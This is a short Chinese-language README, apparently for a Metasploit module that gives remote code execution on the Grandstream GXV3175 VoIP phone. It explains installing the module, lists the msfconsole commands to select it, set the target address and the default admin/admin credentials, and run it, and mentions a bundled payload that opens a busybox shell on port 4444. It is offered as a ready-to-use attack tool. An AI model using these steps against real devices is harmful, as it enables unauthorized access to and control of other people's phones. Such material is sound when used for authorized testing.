
针对 Grandstream GXV3175 VOIP 电话的远程代码执行。
针对 Grandstream GXV3175 VOIP 电话的远程代码执行。
=== 安装 ===
将这些文件复制到 metasploit 顶层目录下的相同目录结构中。
=== 使用 ===
在 msfconsole 中
use exploits/linux/http/grandstream_gxv3175_cmd_exec
set RHOST 192.168.0.1
如有需要,请设置 USERNAME 和 PASSWORD(默认设为 admin / admin)
run
同时还附带一个(默认的)自定义载荷,用于在 4444 端口生成 busybox shell。